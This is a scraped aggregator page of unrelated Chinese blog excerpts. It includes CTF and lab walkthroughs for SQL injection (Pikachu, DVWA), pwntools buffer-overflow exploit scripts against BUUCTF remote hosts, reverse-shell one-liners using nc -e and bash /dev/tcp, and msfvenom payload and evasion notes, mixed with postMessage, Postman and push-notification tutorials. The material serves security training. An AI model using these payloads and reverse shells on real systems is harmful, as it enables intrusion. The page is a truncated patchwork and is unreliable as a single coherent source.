payload

pikachu靶场 :四、SQL注入

大城市里の小女人 提交于 2020-01-30 15:55:36
pikachu靶场 :四、SQL注入 概述 数字型注入(post) 字符型注入(get) insert/update 注入 insert update delete 注入 sql 盲注 基于布尔 基于时间 宽字节注入 概述 在owasp发布的top10排行榜里, 注入漏洞一直是危害排名第一的漏洞 ,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时, 没有做严格的判断 ,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来 防止SQL注入漏洞 : 对传进SQL语句里面的变量进行过滤,不允许危险字符传入; 使用参数化(Parameterized Query 或 Parameterized Statement); 还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重! 数字型注入(post) 在提交页面随便选一个选项,进行查询,使用burp抓包。 因为是数字型,直接在后面加上真命题,不需要加单引号测试。 修改id参数为1 or 1=1 ,发送,得到返回的数据库数据。 字符型注入(get

解决跨域(三)---postMessage

妖精的绣舞 提交于 2020-01-29 06:42:10
postMessage原理及实现 HTML5为了解决跨域的问题,引入了一个全新的API;跨文档通信API(Cross-document messaging)。这个API为window对象新增了一个window.postMessage方法,允许跨窗口通信,不论这两个窗口是否同源。postMessage是h5新增的方法,postMessage可以实现跨文档消息传输(Cross Document Messaging),Internet Explorer 8, Firefox 3, Opera 9, Chrome 3和 Safari 4都支持postMessage。 该方法可以通过绑定window的message事件来监听发送跨文档消息传输内容。 语法 otherWindow . postMessage ( message , targetOrigin , [ transfer ] ) ; otherWindow:其他窗口的一个引用,比如iframe的contentWindow属性、执行window.open返回的窗口对象、或者是命名过或数值索引的window.frames。 message 将要发送到其他window的数据。它将会被结构化克隆算法序列化。这意味着你可以不受什么限制的将数据对象安全的传送给目标窗口而无需自己序列化。

BUU PWN(一)

戏子无情 提交于 2020-01-28 22:30:00
test_your_nc 连上即可拿到shell rip from pwn import * context . log_level = 'debug' #p=process('./17pwn1') p = remote ( "node3.buuoj.cn" , "26137" ) p . recvuntil ( "please input\n" ) payload = 'a' * 0xf + 'a' * 8 + p64 ( 0x401186 ) p . sendline ( payload ) p . recvline ( ) p . recvline ( ) p . interactive ( ) warmup_csaw_2016 from pwn import * context . log_level = 'debug' #p=process('./warmup_csaw_2016') p = remote ( 'node3.buuoj.cn' , '25225' ) p . recvuntil ( '>' ) payload = 'a' * 0x40 + 'a' * 8 + p64 ( 0x40060d ) p . sendline ( payload ) p . interactive ( ) pwn1_sctf_2016 是一个c++程序有点难看懂,且没有栈溢出点

Request Payload

百般思念 提交于 2020-01-28 12:20:52
Postman模拟Request Payload发送请求 原创萧萧慕宇 最后发布于2017-12-05 13:53:46 阅读数 16010 收藏 展开 Postman模拟Request Payload发送请求,如下图所示: 另外补充下Postman中 form-data、x-www-form-urlencoded、raw、binary的区别 1)form-data 就是http请求中的multipart/form-data,它会将表单的数据处理为一条消息,以标签为单元,用分隔符分开。既可以上传键值对,也可以上传文件。 2)x-www-form-urlencoded 就是application/x-www-from-urlencoded,会将表单内的数据转换为键值对,比如,name=java&age = 23 3)raw 可以上传任意格式的文本,可以上传text、json、xml、html等 4)binary 相当于Content-Type:application/octet-stream,从字面意思得知,只可以上传二进制数据,通常用来上传文件,由于没有键值,所以,一次只能上传一个文件。 服务端:(spring control解析) Request Payload 和 Form Data 的区别 原创逆流_Jun 最后发布于2017-06-22 17:50:49 阅读数 5209

unipush实现ios、android推送教程

天大地大妈咪最大 提交于 2020-01-28 04:01:25
写在前面: 1.app是使用uniapp写的,后台是用java写的; 2.unipush支持很多推送模板,有兴趣了解的朋友可以在 官网 查看,因为要给ios实现推送的话只能使用透传模板,所以要实现给安卓和ios都可以推送的话,要在官网示例的透传模板代码上做些许修改; 3.即便代码和推送通道多么健壮,我相信推送成功率仍然是不可能是100%的,这一点android平台需要尤为重视,unipush提供了短信补全的方案,有需要的朋友可以了解一下: 传送门 。 4.由于需求不同本帖代码不一定适用所有业务,故本帖只做抛砖引玉,其次笔者时间有限,以下代码仅以实现单个客户端推送为例,如有其它问题请请留言交流,内容若有问题,欢迎大家批评指正。 文中代码可以达到的效果: 1.无论是ios还是安卓app,应用前置时不推送系统通知栏通知,但是可以给打开的app推送不在系统通知栏显示的消息; 2.app一旦处于退出状态、或者app处于进行被销毁状态,都会在系统通知栏进行通知推送。 注: 1.退出app或者app进程销毁后,推送的方案是由unipush的厂商推送方案实现的,所以想要实现离线推送,务必保证unipush平台的厂商推送配置是正确的,这一点根据官网的文档来一般不会有问题,故在此不再做赘述。 1.获取AppID、AppKey、MasterSecret等参数,这一点应该不需要过多赘述了, 2

Syclover2019 WP

喜你入骨 提交于 2020-01-26 22:52:49
pwn Find Tools 没有附件,只给了远程环境,目的是让我们使用pwntools工具,exp如下: from pwn import * p=remote('pwnto.fun',9999) p.recvuntil("password:") p.send('l1ve_l0ng_and_pwn') #此处不能使用sendline(引入'\n') p.recv() print p.recv #!将接收到的flag打印出来 #p.interactive() 这道题只是发送和接收包,flag是通过接收得到的,而不是通过拿到shell得到的,所以并不需要交互 pwntools IO模块使用: p.send(data) #发送数据 p.sendline(data) #!! 发送数据和'\n' p.recv(numb=2048,timeout=default) #接收指定字节和超时的数据 p.recvline(keepends=True) #接收一行数据 p.recvuntil("...",drop=false) #接收数据直到我们设置的标志 p.recvall( ) #一直接收到EOF为止 p.recvrepeat(timeout=default) #持续接收直到EOF出现或超时 p.interactive( ) #得到shell后进入交互模式 Baby rop 查看保护:

DAY5 DVWA之SQL注入演练(low)

痞子三分冷 提交于 2020-01-26 15:01:08
1、设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸。 2、测试和分析页面的功能 这里有一个输入框 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有个id=1,是不是就是我们输入的user id呢?再输入“2”,发现url变成了 好了,到这里,我们可以得出这里传进去的id的值是我们可以控制的。我们在输入框中输入什么,就会通过id传进去什么! 3、对参数进行测试 对id这个参数进行测试,查看一下它是否存在sql注入漏洞。我们在输入框里面输入“1'”,注意1后面有一个单引号“'”。 发现这里报错了,说我们的sql语句出现了语法错误。 我们可以进行这样一个猜测:首先它这个id是被两个“'”包住的。查询语句可能是这样的: select firstname,surname from users where id = '1'; 当我们在1之后加一个引号,则会导致单引号数目不平衡,那么查询语句会变成这样: select firstname,surname from users where id = '1''; 可以看到最后一个引号没被闭合,那我们该怎么办呢?其实有好多种解决的办法

内网渗透-反弹shell

元气小坏坏 提交于 2020-01-25 02:58:53
大年初一,当然是更一篇重磅文章啦 反弹shell /bin目录下带sh的都是shell nc 1.正向连接,目标机监听自身端口,攻击机主动建立连接 目标机:nc -lvvp 端口 -e /bin/bash (-e cmd.exe) 攻击机:nc -vv 目标IP 监听端口 适用情况:目标机有独立外网ip,攻击机有无都行 2.反向连接,攻击机监听自身端口,目标机主动建立连接 攻击机:nc -lvvp 端口 目标机:nc -vv 攻击机ip 端口 -e /bin/bash 适用情况:攻击机有独立外网ip,目标机在内网,只有一个或多个映射端口 3.聊天/传文件 攻击机:nc -lvvp 端口 < 文件 目标机:nc -vv 攻击机IP 攻击机端口 > 文件 注意:有防火墙会连不上,得找放过的端口 bash 攻击机监听:nc -lvvp 端口 目标机:bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1 把bash重定向 使用kali下msfvenom生成payload msfvenom -l payloads | grep bash #搜索payload制作命令 msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload 目标机运行payload:0<&209-;exec 209<>/dev

【tool】远控免杀专题文章-msfvenom隐藏的参数

末鹿安然 提交于 2020-01-24 22:04:49
本节目录如下: msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 常规参数 msfvenom所有参数 部分参数解读 -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64

adworld-pwn新手练习区

给你一囗甜甜゛ 提交于 2020-01-24 18:03:45
get_shell 学会第一步nc CGfbs IDA反汇编得到伪代码: int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-82h] [ebp-82h] int v5; // [esp-7Eh] [ebp-7Eh] __int16 v6; // [esp-7Ah] [ebp-7Ah] int v7; // [esp-78h] [ebp-78h] unsigned int v8; // [esp-14h] [ebp-14h] ​ v8 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); v4 = 0; v5 = 0; v6 = 0; memset(&v7, 0, 0x64u); puts("please tell me your name:"); read(0, &v4, 0xAu); puts("leave your message please:"); fgets((char *)&v7, 100, stdin); printf("hello %s", &v4); puts("your message is:"); printf((const char *)